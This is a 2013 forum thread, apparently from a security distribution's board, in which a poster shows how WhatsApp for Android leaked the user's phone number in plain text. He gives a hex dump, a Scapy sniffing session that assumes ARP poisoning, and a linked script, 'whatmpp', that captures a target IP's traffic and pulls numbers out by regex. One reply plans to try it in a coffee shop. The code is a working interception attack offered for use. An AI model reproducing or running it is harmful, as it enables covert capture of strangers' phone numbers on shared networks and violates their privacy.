whatmpp

Started by mad_dev, October 27, 2013, 09:52:54 AM

Previous topic - Next topic

mad_dev

Greetings,

WhatsApp for Android devices broadcasts the owner's phone number in plain text over SSL.
This is a huge disadvantage and to some, a threat; especially with online caller id
services like truecaller.

The Packet in question has a fixed length of 190:

Example:
HEX
0000   44 87 FC E7 DD A7 20 02  AF 05 8D 0D 08 00 45 00   D..... .......E.
0010   00 B0 9A 4F 40 00 40 06  C4 27 C0 A8 01 E8 32 16   ...O@.@..'....2.
0020   E7 2A 86 92 01 BB 8B 05  37 96 96 B4 94 44 80 18   .*......7....D..
0030   00 E5 A0 04 00 00 01 01  08 0A 01 51 AE 52 BB EE   ...........Q.R..
0040   18 0D 57 41 01 02 00 00  17 F8 05 01 C8 AB A5 FC   ..WA............
0050   0F 41 6E 64 72 6F 69 64  2D 32 2E 31 31 2E 39 33   .Android-2.11.93
0060   00 00 12 FB 02 BB F8 03  F8 01 9C F8 03 E4 CB 0C   ................
0070   F8 03 B9 7C CA 00 00 46  F8 08 10 DA FC 0C 39 36   ...|...F......xx
0080   36 31 36 33 32 39 37 39  37 37 DA CF 6D EC FC 2E   xxxxxxxxxx..m...
0090   A3 C3 70 41 90 25 FE 4E  80 50 00 7D A1 03 79 C5   ..pA.%.N.P.}..y.
00a0   44 9E 4F A3 3C A7 50 E1  10 0F 96 FF 7F 36 51 49   D.O.<.P......6QI
00b0   17 EF 2E 4C C1 6B 2E 38  5B DA 33 7C DA AD         ...L.k.8[.3|..

RAW
'WA\x01\x02\x00\x00\x17\xf8\x05\x01\xc8\xab\xa5\xfc\x0fAndroid-2.11.93
\x00\x00\x12\xf8\x02\xbb\xf8\x03\xf8\x01\x9c\xf8\x03\xe4\xcb\x0c\xf8\x03
\xb9|\xca\x00\x00F\xf8\x08\x10\xda\xfc\x0cXXXXXXXXXX\xe8\xcfm\xec\xfc.
\xa3\xc3pA\x90%\xfeN\x80P\x00}\xa1\x03y\xc5D\x9eO\xa3<\xa7P\xe1\x10\x0f
\x96\xff\x7f6QI\x17\xef.L\xc1k.8[\xda3|\xda\xad

xxxxxxxxxx  ---> Phone Number in HEX
XXXXXXXXXX  ---> Phone Number in RAW

Scapy comes in handy when automating this process, as oppose to going through
the dump and finding it manually.

#This assumes ARP-Poisoning
root@J-Smith:~# scapy
Welcome to Scapy (2.2.0)
>>> s = sniff(iface=eth0, filter='tcp and host 192.168.1.43', count=1000)
>>> for r in range(1000):
...     try:
...          while len(s[r]) == 190:
...                summ = r
...                print '\nPacket::%s::Length::%s' %(str(summ),  str(length))
...                print 'Summary::%s' %str(load_pcap[r].summary())
...                inst = s[r].load
...                esc = re.split('[\W]+[^9]', inst)   ###  You should change [9] this to your country code(first number only)
...                reg = re.compile("[0-9]+[^9]")   ###  for example: USA ---> [1]
...                number = reg.findall(str(esc))
...                for i in number:
...                      ii = i
...                reg2 = re.split("['-]", str(ii))
...                for iii in reg2:
...                      if len(iii) > 5:
...                         print 'Phone Number::%s' %str(iii)
...                break
...     except:
...       pass
...
Packet::70::Length::190
Summary::Ether / IP / TCP 192.168.1.43:46937 > 50.22.231.39:https PA / Raw
Phone Number::1234567890

Packet::1602::Length::190
Summary::Ether / IP / TCP 192.168.1.43:34450 > 50.22.231.42:https PA / Raw
Phone Number::1234567890

Packet::2151::Length::190
Summary::Ether / IP / TCP 192.168.1.43:55404 > 184.173.136.74:https PA / Raw
Phone Number::1234567890
EOF


I wrote a simple script that takes care of sniffing and regexing.

http://penbang.sysbase.org/other_projects/python_scripts/whatmpp

mad-dev@SYSBASE:~/documents/Study$ ./whatmpp --help
usage: ./whatmpp [-h] -t ip_address [-i interface] [-p protocol] -c packets
                 [-pL lenpacket]

optional arguments:
  -h, --help       show this help message and exit
  -t ip_address    IP of Target (default: None)
  -i interface     Interface: i.e. eth0, ppp0, wifi0... (default: eth0)
  -p protocol      Protocol: TCP, UDP, ICMP, Other (default: tcp)
  -c packets       Number of Packets to Intercept (default: None)
  -pL len(packet)  Length of The Packet to Regex (default: 190)

The whatsapp IP-list at line 17 is not conclusive. You may need to update
it.


ScreenShot



Please disregard the inconsistencies in the screenshot(IP), I loaded an old cap file. 

b4d_bl0ck

Hi mad_dev,
thanks for sharing.
It seems you are having fun!  ;D

I guess someone will test it and post his feedback.
Bye and enjoy BackBox!
bool secure = check_paranoia() ? true : false;

Dox3r

Looks neat, ty. ill be checking this out.

fukwad

Cool. I will try this out in a coffee shop. Drinking coffee always makes things better.   :)